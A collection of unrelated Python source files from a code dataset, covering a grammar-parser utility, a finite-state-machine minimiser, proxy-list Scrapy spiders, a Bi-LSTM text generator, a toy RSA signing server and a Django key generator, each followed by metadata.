tokens_inside_decl[i]\n i += 1\n\n modifiers.variation_name = remove_escapement(modifiers.variation_name)\n modifiers.argument_name = remove_escapement(modifiers.argument_name)\n\n return modifiers\n\ndef find_modifiers_reference(tokens_inside_reference):\n \"\"\"\n Finds and create a representation of the modifiers from a list of tokens\n representing the inside of a reference. Returns the representation.\n @pre: there is no syntax error in this part.\n \"\"\"\n modifiers = mods.ReferenceModifiersRepr()\n\n i = 0\n if tokens_inside_reference[0] == CASE_GEN_SYM:\n modifiers.casegen = True\n i += 1\n\n expecting_randgen_name = False\n expecting_percentgen = False\n expecting_variation = False\n expecting_argument = False\n while i < len(tokens_inside_reference):\n if tokens_inside_reference[i] == RAND_GEN_SYM:\n modifiers.randgen_name = \"\"\n expecting_randgen_name = True\n expecting_percentgen = False\n expecting_variation = False\n expecting_argument = False\n elif tokens_inside_reference[i] == PERCENT_GEN_SYM:\n expecting_randgen_name = False\n expecting_percentgen = True\n expecting_variation = False\n expecting_argument = False\n elif tokens_inside_reference[i] == VARIATION_SYM:\n modifiers.variation_name = \"\"\n expecting_randgen_name = False\n expecting_percentgen = False\n expecting_variation = True\n expecting_argument = False\n elif tokens_inside_reference[i] == ARG_SYM:\n modifiers.argument_value = \"\"\n expecting_randgen_name = False\n expecting_percentgen = False\n expecting_variation = False\n expecting_argument = True\n elif expecting_randgen_name:\n modifiers.randgen_name += tokens_inside_reference[i]\n elif expecting_percentgen:\n modifiers.percentage_randgen = int(tokens_inside_reference[i])\n expecting_percentgen = False\n elif expecting_variation:\n modifiers.variation_name += tokens_inside_reference[i]\n elif expecting_argument:\n modifiers.argument_value += tokens_inside_reference[i]\n i += 1\n\n modifiers.randgen_name = remove_escapement(modifiers.randgen_name)\n modifiers.variation_name = remove_escapement(modifiers.variation_name)\n modifiers.argument_value = remove_escapement(modifiers.argument_value)\n\n return modifiers\n\ndef find_modifiers_word_group(tokens_inside_word_group):\n \"\"\"\n Finds and create a representation of the modifiers from a list of tokens\n representing the inside of a word group. 
Returns the representation.\n @pre: there is no syntax error in this part.\n \"\"\"\n modifiers = mods.WordGroupModifiersRepr()\n\n i = 0\n if tokens_inside_word_group[0] == CASE_GEN_SYM:\n modifiers.casegen = True\n i += 1\n\n expecting_randgen_name = False\n expecting_percentgen = False\n while i < len(tokens_inside_word_group):\n if tokens_inside_word_group[i] == RAND_GEN_SYM:\n modifiers.randgen_name = \"\"\n expecting_randgen_name = True\n expecting_percentgen = False\n elif tokens_inside_word_group[i] == PERCENT_GEN_SYM:\n expecting_percentgen = True\n expecting_randgen_name = False\n elif expecting_randgen_name:\n modifiers.randgen_name += tokens_inside_word_group[i]\n elif expecting_percentgen:\n modifiers.percentage_randgen = int(tokens_inside_word_group[i])\n expecting_percentgen = False\n i += 1\n\n modifiers.randgen_name = remove_escapement(modifiers.randgen_name)\n\n return modifiers\n\ndef find_modifiers_choice(tokens_inside_choice):\n \"\"\"\n Finds and create a representation of the modifiers from a list of tokens\n representing the inside of a choice. Returns the representation.\n @pre: there is no syntax error in this part.\n \"\"\"\n modifiers = mods.ChoiceModifiersRepr()\n\n if tokens_inside_choice[0] == CASE_GEN_SYM:\n modifiers.casegen = True\n if tokens_inside_choice[-1] == RAND_GEN_SYM:\n modifiers.randgen = True\n\n return modifiers\n\n\ndef find_nb_examples_asked(annotation_interior):\n \"\"\"\n Returns the training and testing number of examples asked for an intent\n declaration as a tuple. Returns `None` if the numbers given are not numbers.\n @pre: there is no syntax error in the annotation.\n \"\"\"\n if len(annotation_interior) == 0:\n return None\n nb_train = None\n nb_test = None\n\n if len(annotation_interior) == 1:\n nb_train = annotation_interior[0]\n else:\n expecting_train = False\n expecting_test = False\n for token in annotation_interior:\n if ( token not in (ANNOTATION_ASSIGNMENT_SYM, ANNOTATION_SEP)\n and not token.isspace()):\n if PATTERN_NB_TRAIN_EX_KEY.match(token):\n expecting_train = True\n elif PATTERN_NB_TEST_EX_KEY.match(token):\n expecting_test = True\n elif expecting_train:\n nb_train = token\n expecting_train = False\n elif expecting_test:\n nb_test = token\n expecting_test = False\n\n if nb_train is None and nb_test is None:\n return None\n\n if nb_train is not None:\n nb_train = nb_train.replace(ANNOTATION_IGNORED_SYM, \"\")\n if nb_test is not None:\n nb_test = nb_test.replace(ANNOTATION_IGNORED_SYM, \"\")\n\n try:\n nb_train = int(nb_train)\n if nb_test is None:\n nb_test = 0\n else:\n nb_test = int(nb_test)\n except ValueError:\n return None\n return (nb_train, nb_test)\n\n\ndef find_alt_slot_and_index(slot_rule_tokens):\n \"\"\"\n Returns the index of the equal sign and the alt slot value as a 2-tuple,\n from the tokens representing a slot rule. 
Returns `None` if no alt slot\n value was found.\n @pre: there is no syntax error in this part.\n \"\"\"\n try:\n index = slot_rule_tokens.index(ALT_SLOT_VALUE_NAME_SYM)\n except ValueError:\n return None\n if index+1 < len(slot_rule_tokens):\n i = index+1\n alt_slot_val = slot_rule_tokens[i]\n if alt_slot_val == ' ':\n alt_slot_val = \"\"\n i += 1\n while i < len(slot_rule_tokens):\n alt_slot_val += slot_rule_tokens[i]\n i += 1\n return (index, remove_escapement(alt_slot_val))\n return None\n\n\ndef next_choice_tokens(choice_interior_tokens):\n \"\"\"\n Yields the next choice as a list of tokens in `choice_interior_tokens`.\n @pre: there is no syntax error in this part.\n \"\"\"\n current_choice = []\n for (i, token) in enumerate(choice_interior_tokens):\n if token == CASE_GEN_SYM:\n continue\n elif token == RAND_GEN_SYM:\n if i == len(choice_interior_tokens)-1: # Random generation symbol\n # NOTE: this should be changed if named randgen or percentgen\n # is supported in the future.\n break\n else: # Not a random generation symbol\n current_choice.append(token)\n elif token == CHOICE_SEP:\n yield current_choice\n current_choice = []\n else:\n current_choice.append(token)\n yield current_choice\n\n\n\ndef next_sub_rule_tokens(tokens):\n \"\"\"\n Yields the next sub-rule from a rule\n represented as tokens (i.e. a list of str).\n @pre: `tokens` represents a valid rule.\n \"\"\"\n current_sub_rule = []\n stop_with_char = None\n reading_sub_rule = False\n for token in tokens:\n if reading_sub_rule:\n if token == stop_with_char:\n current_sub_rule.append(token)\n yield current_sub_rule\n current_sub_rule = []\n stop_with_char = None\n reading_sub_rule = False\n else:\n current_sub_rule.append(token)\n else: # Looking for the start of a sub-rule\n if is_start_unit_sym(token): # Unit reference starting point\n current_sub_rule.append(token)\n reading_sub_rule = True\n stop_with_char = UNIT_CLOSE_SYM\n elif token == UNIT_OPEN_SYM: # Word group starting point\n current_sub_rule.append(token)\n reading_sub_rule = True\n stop_with_char = UNIT_CLOSE_SYM\n elif token == CHOICE_OPEN_SYM: # Word group starting point\n current_sub_rule.append(token)\n reading_sub_rule = True\n stop_with_char = CHOICE_CLOSE_SYM\n else: # Word\n yield [token]\n\n\ndef is_sub_rule_word(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens` represents a word.\n @pre: considers `sub_rule_tokens` is never a single space.\n \"\"\"\n return len(sub_rule_tokens) == 1\ndef is_sub_rule_word_group(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents a word group.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == UNIT_OPEN_SYM\ndef is_sub_rule_choice(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents a choice.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == CHOICE_OPEN_SYM\ndef is_sub_rule_alias_ref(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents an alias reference.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == ALIAS_SYM\ndef is_sub_rule_slot_ref(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents a slot reference.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == SLOT_SYM\ndef is_sub_rule_intent_ref(sub_rule_tokens):\n \"\"\"\n Returns 
`True` if the list of str `sub_rule_tokens`\n represents an intent reference.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == INTENT_SYM\n","sub_path":"chatette/parsing/parser_utils.py","file_name":"parser_utils.py","file_ext":"py","file_size_in_byte":36916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"646559958","text":"from ConnectDataBase import ConnectDataBase\n\n# class for inserting and querying elements in the database\nclass HandlerQuery:\n\n\t# method for inserting, deleting or updating an element in a table\n\tdef insertToTable(self, query, ConnectionDB):\n\t\tConnectionDB.cursor.execute(query)\n\t\tConnectionDB.Conex.commit()\n\t\t#self.ConnectionDB.cursor.close()\n\n\t# method for running a basic query against the database\n\tdef queryBasicDataBase(self, query, ConnectionDB):\n\t\tConnectionDB.cursor.execute(query)\n\n\t\tcollection_id = []\n\t\tfor element in ConnectionDB.cursor:\n\n\t\t\tcollection_id.append(element)\n\n\t\treturn collection_id\n","sub_path":"view/view/admin/pythonScripts/CrudDataBase.py","file_name":"CrudDataBase.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"620487960","text":"import sys\r\nfrom args import Args, print_exit\r\nfrom fsm import FSM\r\nfrom minimalize import Minimize\r\n\r\n# ----------------------------------< --analyze-string >---------------------------------------#\r\ndef analyze_string(string, automata):\r\n for char in string:\r\n if char not in automata[\"alphabet\"]:\r\n print_exit('0', 1)\r\n\r\n state = automata[\"start\"]\r\n char_cnt = 0\r\n str_len = len(string)\r\n\r\n for char in string:\r\n found = False\r\n \r\n for rule in automata[\"rules\"]:\r\n if rule.c == char and rule.s1 == state:\r\n state = rule.s2\r\n char_cnt += 1\r\n found = True\r\n break\r\n \r\n if not found:\r\n return '0'\r\n\r\n if state not in automata[\"finals\"]:\r\n return '0'\r\n else:\r\n return '1'\r\n\r\n# -------------------------------------< FINAL OUTPUT >-----------------------------------------#\r\ndef print_FSM(fsm):\r\n out = \"(\\n{\"\r\n\r\n # all states\r\n for state in fsm[\"states\"]:\r\n out += state+', '\r\n out = out[0:-2]+'},\\n{'\r\n\r\n # alphabet\r\n for char in fsm[\"alphabet\"]:\r\n out += '\\''+char+'\\', '\r\n out = out[0:-2]+'},\\n{\\n'\r\n\r\n # rules\r\n for rule in fsm[\"rules\"]:\r\n out += rule+',\\n'\r\n\r\n # start state\r\n out = out[0:-2] + '\\n},\\n' + fsm[\"start\"] + ',\\n{'\r\n\r\n # final states\r\n for state in fsm[\"finals\"]:\r\n out += state+', '\r\n out = out[0:-2]+'}\\n)\\n'\r\n\r\n return out\r\n\r\n# ----------------------------------------------------------------------------------------------#\r\n# Parse arguments\r\nargs = Args()\r\n# Check arguments\r\nargs.check_args()\r\n\r\n# Print help if the --help switch is present\r\nif args.argv.help is True:\r\n if len(sys.argv) != 2:\r\n print_exit(\"Wrong arguments.\", 1)\r\n print(args.print_help())\r\n sys.exit(0)\r\n\r\n# Use stdin if the --input switch does not exist\r\nif args.argv.input is None:\r\n inputFile = sys.stdin\r\nelse:\r\n try:\r\n inputFile = open(args.argv.input, mode=\"r\", newline=\"\", encoding=\"utf-8\")\r\n except IOError:\r\n print_exit(\"Opening input file failed.\", 2)\r\n\r\n# Use stdout if the --output switch does not exist\r\nif args.argv.output is None:\r\n outputFile = sys.stdout\r\nelse:\r\n try:\r\n outputFile = open(args.argv.output, mode=\"w\", newline=\"\", 
encoding=\"utf-8\")\r\n except IOError:\r\n print_exit(\"Opening output file failed.\", 3)\r\n\r\n#Let the scanner do the work and get us all the tokens.\r\nWSFA = FSM(inputFile.read(), args)\r\n\r\n# final output based on command line options\r\nif args.argv.analyze is not None:\r\n ret = analyze_string(args.argv.analyze, WSFA.automata)\r\n outputFile.write(ret)\r\n\r\nelif args.argv.f is True:\r\n outputFile.write(WSFA.nonFinState)\r\n\r\nelif args.argv.m is True:\r\n min = Minimize(WSFA)\r\n outputFile.write(print_FSM( min.automata ))\r\n\r\nelse:\r\n WSFA.create_sorted_automata()\r\n outputFile.write(print_FSM( WSFA.automata ))\r\n\r\ninputFile.close()\r\noutputFile.close()\r\n\r\nexit(0)\r\n","sub_path":"minimize_automata/mka.py","file_name":"mka.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"535608855","text":"\n#coding:utf-8\nimport time\nfrom scrapy.http import Request\nfrom scrapy.spiders import Spider\nfrom urlparse import urljoin\nfrom ..DaiLi import DailiItem\nfrom ..DaiLi import DailiItem1\nfrom urlparse import urljoin\n\nclass Daili(Spider):\n\tname = \"daili\"\n\tallowd_domains = \".proxy360.cn\"\n\tstart_urls = [\"http://www.proxy360.cn/Proxy\"]\n\n\tdef parse(self, response):\n\t\t# items = []\n\t\tip = response.xpath('''//div[@class=\"proxylistitem\"]/div[1]/span[1]/text()''').extract()\n\t\tport = response.xpath('''//div[@class=\"proxylistitem\"]/div[1]/span[2]/text()''').extract()\n\t\tzone = response.xpath('''//div[@class=\"proxylistitem\"]/div[1]/span[4]/text()''').extract()\n\t\ttime = response.xpath('''//div[@class=\"proxylistitem\"]/div[1]/span[last()]/text()''').extract()\n\t\tfor i in zip(ip, port, zone, time):\n\t\t\t# print i[0], i[1], i[2], i[3]\n\t\t\titem = DailiItem()\n\t\t\titem[\"ip\"] = ''.join(i[0]).strip()\n\t\t\titem['port'] = ''.join(i[1]).strip()\n\t\t\titem['zone'] = ''.join(i[2]).strip()\n\t\t\titem['time'] = ''.join(i[3]).strip()\n\t\t\t# items.append(item)\n\t\t\tyield item\n\nclass Daili1(Spider):\n\n\tname = \"daili1\"\n\tallowd_domains = \"youdaili.net\"\n\tstart_urls = [\"http://www.youdaili.net/Daili/http/\"]\n\n\tdef parse(self, response):\n\t\turls = response.url\n\t\tmeta = {\n\t\t\"urls\":urls,\n\t\t}\n\t\tlink = response.xpath('''//ul[@class=\"newslist_line\"]/li/a/@href''').extract()\n\t\tfor lin in link:\n\t\t\t# print lin,\"SSSSSSSSSSSSSSSSSSSSSSSsss\"\n\t\t\tyield Request(lin, callback=self.inof, meta=meta)\n\t\tnext_link = response.xpath('''//ul[@class=\"pages_ulstyle\"]/li[last()-2]/a/@href''').extract()\n\t\tif next_link:\n\t\t\t# print next_link, \"dddddddddddddddddddd\"\n\t\t\tyield Request(urljoin(urls, ''.join(next_link)), callback=self.parse)\n\n\tdef inof(self, response):\n\t\t#urls = response.meta[\"urls\"]\n\t\turls = \"http://www.youdaili.net/Daili/http/\"\n\t\tip = response.xpath('''//div[@class=\"cont_font\"]//p//text()[position()>0 and position()<151]''').extract()\n\t\taddtime = ''.join(response.xpath('''//div[@class=\"cont_time\"]/text()[1]''').re(u'''发布时间:(\\S+)'''))\n\t\titem = DailiItem1()\n\t\tfor i in ip:\n\t\t\titem[\"ip\"] = ''.join(i).split(\":\")[0].strip()\n\t\t\titem['port'] = ''.join(i).split(\":\")[1].split(\"@\")[0].strip()\n\t\t\titem['zone'] = ''.join(i).split(\"@\")[1].strip()\n\t\t\titem['spidertime'] = time.strftime(\"%Y-%m-%d\", time.localtime())\n\t\t\titem['addtime'] = addtime\n\t\t\tyield item \n\t\tlink = response.xpath('''//ul[@class=\"pagelist\"]/li[last()]/a/@href''').extract()\n\t\tif 
link:\n\t\t\tyield Request(urljoin(urls, ''.join(link)), callback=self.inof)\n","sub_path":"daili/spiders/daili.py","file_name":"daili.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329338360","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 25 15:01:46 2018\r\n\r\n@author: 47532\r\n\"\"\"\r\n\r\nimport re\r\nimport regex\r\nimport tensorflow as tf\r\nimport pandas as pd\r\nimport numpy as np\r\nimport copy\r\nfrom tensorflow.contrib import rnn\r\nfrom tqdm import tqdm\r\n\r\ndef get_data():\r\n with open('comment1', encoding='utf8', mode='r') as rfile:\r\n words = []\r\n sentences = []\r\n def repl(m):\r\n inner_word = list(m.group(0))\r\n return \" \" + ''.join(inner_word) + \" \"\r\n for line in rfile:\r\n line = line.lower()\r\n line = re.sub(r'<.*>', ' ', line)\r\n line = re.sub('[\\s+\\.\\!\\?\\,\\/_,$%^*(+\\\"\\:\\-\\@\\#\\&)]+', \" \", line)\r\n sentence = regex.sub(r'\\p{So}\\p{Sk}*', repl, line)\r\n word = sentence.split() \r\n if len(word) > 1:\r\n if \"'\" in word:\r\n word.remove(\"'\")\r\n else: \r\n word = word\r\n words.extend(word)\r\n sentences.append(word) \r\n else:\r\n continue \r\n words_sort = pd.DataFrame(words)[0].value_counts() \r\n #words_sort = words_sort[words_sort>1] \r\n word_bank = list(words_sort.index)\r\n #word_bank = list(set(words))\r\n word2id = {} # word => id mapping\r\n for i in range(len(word_bank)):\r\n word2id[word_bank[i]] = i+1 \r\n word2id['EOS'] = len(word_bank)+1 # add 'EOS' to word2id\r\n inputs = [] \r\n for sent in sentences: # the input is a list of sentences; each iteration handles one sentence\r\n input_sent = []\r\n for i in range(len(sent)): # process every word of the sentence\r\n input_id = word2id.get(sent[i])\r\n if not input_id: # skip words that are not in the vocabulary\r\n continue\r\n input_sent.append(input_id)\r\n input_sent.append(len(word_bank)+1) # append 'EOS' at the end of each sentence\r\n if len(input_sent) > 21:\r\n input_sent = [input_sent[i:i+20] for i in range(0,len(input_sent),20)]\r\n inputs.extend(input_sent)\r\n else:\r\n inputs.append(input_sent)\r\n #pad = np.mean([len(x) for x in inputs])\r\n pad = len(max(inputs, key=len))\r\n inputs = [i + [0]*(pad-len(i)) for i in inputs]\r\n return word_bank, pad, inputs, len(word2id)+1, word2id\r\nword_bank, sen_length, inputs, vocab_size, word2id = get_data()\r\n\r\nclass TrainData:\r\n def __init__(self, inputs, batch_size, sen_length):\r\n self.inputs = inputs\r\n self.batch_size = batch_size\r\n self.sen_length = sen_length\r\n self.n = len(inputs) \r\n def get_batch_data(self, batch):\r\n global batch_size\r\n start_pos = batch * self.batch_size\r\n end_pos = min((batch + 1) * self.batch_size, self.n)\r\n xdata = self.inputs[start_pos:end_pos]\r\n # shift the target data left by one position\r\n ydata = copy.deepcopy(self.inputs[start_pos:end_pos])\r\n for row in ydata:\r\n b = row.pop(0)\r\n row.append(b) \r\n x_batch = np.array(xdata, dtype=np.int32)\r\n y_batch = np.array(ydata, dtype=np.int32)\r\n return x_batch, y_batch\r\n def get_num_batches(self):\r\n return max(self.n - 1, 0) // self.batch_size \r\n \r\nbatch_size = 128\r\ntrain_data = TrainData(inputs, batch_size, sen_length) #inputs, batch_size, sen_length\r\nprint('Train size: %s' % (train_data.get_num_batches()*batch_size))\r\nprint('Vocab_size: %s' % vocab_size) \r\n\r\ndef build_inputs(num_steps):\r\n # num_seqs: number of sequences in each batch\r\n # num_steps: number of tokens in each sequence\r\n inputs = tf.placeholder(tf.int32, shape=[None, num_steps], name='inputs')\r\n targets = tf.placeholder(tf.int32, shape=[None, num_steps], name='targets')\r\n return inputs, 
targets\r\n\r\ndef build_lstm(hidden_dim, num_layers, batch_size, dropout_rate, sampling):\r\n # hidden_dim: number of units in each LSTM hidden layer\r\n # num_layers: number of LSTM hidden layers\r\n # lstm cell\r\n lstm_cell_fw = rnn.BasicLSTMCell(hidden_dim, forget_bias=1.0, state_is_tuple=True)\r\n lstm_cell_bw = rnn.BasicLSTMCell(hidden_dim, forget_bias=1.0, state_is_tuple=True) \r\n # add dropout\r\n if not sampling:\r\n lstm_cell_fw = rnn.DropoutWrapper(lstm_cell_fw, output_keep_prob=(1 - dropout_rate))\r\n lstm_cell_bw = rnn.DropoutWrapper(lstm_cell_bw, output_keep_prob=(1 - dropout_rate))\r\n # stack the layers\r\n lstm_cell_fw = rnn.MultiRNNCell([lstm_cell_fw] * num_layers, state_is_tuple=True)\r\n lstm_cell_bw = rnn.MultiRNNCell([lstm_cell_bw] * num_layers, state_is_tuple=True)\r\n initial_state_fw = lstm_cell_fw.zero_state(batch_size, tf.float32)\r\n initial_state_bw = lstm_cell_bw.zero_state(batch_size, tf.float32) \r\n return lstm_cell_fw, lstm_cell_bw, initial_state_fw, initial_state_bw\r\n\r\ndef build_output(lstm_output, hidden_dim, vocab_size, lambd, num_batches):\r\n outputs = tf.reshape(tf.concat(lstm_output,1), [-1, hidden_dim * 2])\r\n # fully connect the LSTM layer to the softmax layer\r\n with tf.variable_scope('softmax'):\r\n softmax_w = tf.get_variable(\"softmax_w\", shape = [hidden_dim * 2, vocab_size], \r\n regularizer=tf.contrib.layers.l2_regularizer(scale=lambd / num_batches), \r\n initializer = tf.random_uniform_initializer(-1,1,seed=1))\r\n softmax_b = tf.get_variable(\"softmax_b\", initializer = tf.zeros([vocab_size])) \r\n # compute the logits\r\n logits = tf.matmul(outputs, softmax_w) + softmax_b \r\n # the softmax layer returns a probability distribution\r\n preds = tf.nn.softmax(logits, name='predictions') \r\n return preds, logits\r\n\r\ndef build_loss(logits, targets): \r\n # Softmax cross entropy loss \r\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels = tf.reshape(targets, [-1]), logits = logits)) \r\n return loss\r\n\r\ndef build_optimizer(loss, learning_rate):\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss) \r\n return optimizer\r\n\r\nclass Bi_LSTM: \r\n def __init__(self, vocab_size, batch_size, \r\n num_batches, num_steps=sen_length, embedding_size=32, hidden_dim=30, \r\n num_layers=1, learning_rate=0.01, lambd=0.01, dropout_rate=0.5, sampling=True):\r\n self.lr = learning_rate\r\n self.lambd = lambd\r\n self.dropout_rate = dropout_rate \r\n self.num_layers = num_layers \r\n self.num_batches = num_batches\r\n self.embedding_size = embedding_size\r\n self.hidden_dim = hidden_dim \r\n self.vocab_size = vocab_size\r\n if sampling:\r\n self.batch_size, self.num_steps = 1, 1\r\n else:\r\n self.batch_size, self.num_steps = batch_size, num_steps\r\n \r\n tf.reset_default_graph() \r\n # input layer\r\n self.inputs = tf.placeholder(tf.int32, shape=[None, self.num_steps], name='inputs')\r\n self.targets = tf.placeholder(tf.int32, shape=[None, self.num_steps], name='targets')\r\n # LSTM layers\r\n lstm_cell_fw, lstm_cell_bw, self.initial_state_fw, self.initial_state_bw = build_lstm(self.hidden_dim, self.num_layers, self.batch_size, self.dropout_rate, sampling)\r\n # look up embeddings for the inputs\r\n self.embedding = tf.get_variable(\"embedding\", shape=[self.vocab_size, self.embedding_size],\r\n regularizer=tf.contrib.layers.l2_regularizer(scale=self.lambd / self.num_batches),\r\n initializer=tf.random_uniform_initializer(-1,1,seed=1))\r\n self.inputs_emb = tf.nn.embedding_lookup(self.embedding, self.inputs)\r\n self.inputs_emb = tf.unstack(self.inputs_emb, self.num_steps, 1)\r\n # run the RNN\r\n outputs, self.final_state_fw, self.final_state_bw = 
rnn.static_bidirectional_rnn(lstm_cell_fw, lstm_cell_bw, self.inputs_emb, \r\n initial_state_fw = self.initial_state_fw, initial_state_bw = self.initial_state_bw, dtype=tf.float32)\r\n # softmax prediction probability\r\n self.prediction, self.logits = build_output(outputs, self.hidden_dim, self.vocab_size, self.lambd, self.num_batches)\r\n # Loss and optimizer\r\n self.loss = build_loss(self.logits, self.targets)\r\n self.optimizer = build_optimizer(self.loss, self.lr)\r\n \r\n#%% =================================== training data ============================= \r\nnum_batches = train_data.get_num_batches()\r\nmodel = Bi_LSTM(vocab_size, batch_size, num_batches, sampling=False)\r\n\r\nepochs = 20\r\nwith tf.Session() as sess:\r\n sess.run(tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()))\r\n writer = tf.summary.FileWriter('./comments_model/bi_LSTM', sess.graph) # self.global_step.eval(session=sess)\r\n step = 0\r\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=1)\r\n new_state_fw, new_state_bw = sess.run([model.initial_state_fw, model.initial_state_bw])\r\n for index in range(epochs): \r\n total_loss = 0.0\r\n for batch in tqdm(range(num_batches)):\r\n batch_inputs, batch_targets = train_data.get_batch_data(batch)\r\n # build the feed dict for this TensorFlow training step\r\n feed = {model.inputs: batch_inputs, model.targets: batch_targets, model.initial_state_fw: new_state_fw, model.initial_state_bw: new_state_bw}\r\n batch_loss, new_state_fw, new_state_bw, _ = sess.run([model.loss, model.final_state_fw, model.final_state_bw, model.optimizer], feed_dict=feed)\r\n total_loss += batch_loss\r\n step += 1\r\n if step % 100 == 0:\r\n saver.save(sess, './comments_model/bi_LSTM/', global_step=step)\r\n if step % 10000 == 0:\r\n print(step)\r\n print('Train Loss at epoch {}: {:5.6f}'.format(index+1, total_loss / num_batches))\r\n\r\n#%% =================================== generate sentences ============================= \r\ndef pick_top_n(preds, vocab_size, top_n=10):\r\n # pick the top_n most likely characters from the prediction\r\n p = np.squeeze(preds)\r\n #p1 = list(p)\r\n #c = p1.index(max(p1))\r\n p = p[1:]\r\n # zero out every position except the top_n predictions\r\n p[np.argsort(p)[:-top_n]] = 0\r\n # normalize the probabilities\r\n p = p / np.sum(p)\r\n # randomly sample one character\r\n c = np.random.choice(vocab_size-1, 1, p=p)[0]+1\r\n return c\r\n \r\ndef sample(n_words, vocab_size, batch_size, num_batches, prime):\r\n # prime: the seed text \r\n samples=[prime]\r\n # sampling=True means the batch size is 1 x 1\r\n model = Bi_LSTM(vocab_size, batch_size, num_batches, sampling=True)\r\n saver = tf.train.Saver()\r\n with tf.Session() as sess:\r\n # load the model parameters and restore the session\r\n checkpoint_file = tf.train.latest_checkpoint('./comments_model/bi_LSTM')\r\n saver.restore(sess, checkpoint_file)\r\n new_state_fw, new_state_bw = sess.run([model.initial_state_fw, model.initial_state_bw]) \r\n # keep generating characters until the requested count is reached\r\n c = word2id.get(prime)\r\n for i in range(n_words):\r\n test_word_id = c\r\n if test_word_id == word2id.get('EOS'):\r\n break\r\n else:\r\n feed = {model.inputs: [[test_word_id]],\r\n model.initial_state_fw: new_state_fw, model.initial_state_bw: new_state_bw}\r\n #preds= sess.run([model.prediction], feed_dict=feed)\r\n preds, new_state_fw, new_state_bw = sess.run([model.prediction, model.final_state_fw, model.final_state_bw], feed_dict=feed)\r\n c = pick_top_n(preds, vocab_size)\r\n samples.extend(x for x,v in word2id.items() if v==c) \r\n print(' '.join(samples))\r\n \r\nfor i in range(5): \r\n #sample(10, vocab_size, batch_size, num_batches, prime = \"you\")\r\n for j in [\"thank\", \"beautiful\", \"very\", \"bro\", 
\"this\",\"you\" ]:\r\n sample(20, vocab_size, batch_size, num_batches, prime = j)\r\n\r\n","sub_path":"language models/Bi-LSTM.py","file_name":"Bi-LSTM.py","file_ext":"py","file_size_in_byte":12012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235838956","text":"import socket\nimport sys\nimport util\n\nfrom sympy.crypto.crypto import rsa_private_key, rsa_public_key\n\n\n\ndef start():\n # Create a TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the port\n server_address = (util.TTP_address, util.TTP_listen_port)\n print('starting up on {} port {}'.format(*server_address))\n sock.bind(server_address)\n\n # Listen for incoming connections\n while True:\n sock.listen(1)\n while True:\n # Wait for a connection\n print('TTP: waiting for a connection')\n connection, client_address = sock.accept()\n client_msg = bytearray()\n\n print('TTP: connection from', client_address)\n\n # Receive the data in small chunks and retransmit it\n while True:\n data = connection.recv(1024)\n print('TTP: received {!r}'.format(data))\n client_msg = \"\".join(util.bytesToStringArr(data))\n if(client_msg==util.signRequest):\n connection.sendall(util.numbersToByteArr([\"OK\"]))\n data = connection.recv(1024) # get len(name)(4 byte)|name|PK(128 byte)\n ln = int.from_bytes(data[:4], byteorder='big')\n name = int.from_bytes(data[4:4+ln], byteorder='big')\n pk = int.from_bytes(data[4+ln:4+ln+128], byteorder='big')\n sig = util.RSA_decrypt(util.H512([name,pk])% util.rsa_N, util.rsa_prk)\n signedCert = util.rsa_N.to_bytes(128,byteorder='big')+sig.to_bytes(128,byteorder='big')\n connection.sendall(signedCert)\n elif(client_msg==util.keyRequest):\n response = util.rsa_N.to_bytes(128,byteorder='big')+util.rsa_e.to_bytes(128,byteorder='big')\n connection.sendall(response)\n connection.close()\n break\n\n\ndef main():\n util.RSA_keyGeneration(17)\n start()\n\nmain()\n","sub_path":"TTP.py","file_name":"TTP.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"177953754","text":"\n\"\"\"Script for creating a secret key\n\nAttributes\n----------\nCHARS : str\n Valid characters for a django secret key: a-z, 0-9, !@#$%^&*(-_=+)\n (No capitals)\n\"\"\"\n\nimport secrets\nimport json\n\n\nCHARS = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'\n\n\ndef new_key(target=\"key.json\"):\n \"\"\"Generate a new key file, in the form of a JSON with one entry (``key``).\n\n Parameters\n ----------\n target : str\n Name of the file to generate; defaults to key.json\n \"\"\"\n\n key = \"\".join([secrets.choice(CHARS) for i in range(50)])\n print(\"Created new secret key: \" + key)\n\n with open(target, \"w+\") as keyfile:\n keyfile.write(json.dumps({\"key\": key}))\n\n\nif __name__ == '__main__':\n new_key()\n","sub_path":"checkin/new_key.py","file_name":"new_key.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"534350102","text":"from django.conf import settings\nfrom django.conf.urls import *\nfrom django.urls import 